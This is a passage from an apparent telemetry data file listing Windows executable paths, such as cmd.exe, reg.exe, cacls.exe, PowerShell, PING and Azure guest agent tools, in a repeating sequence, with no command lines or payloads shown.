\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\wsqmcons.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\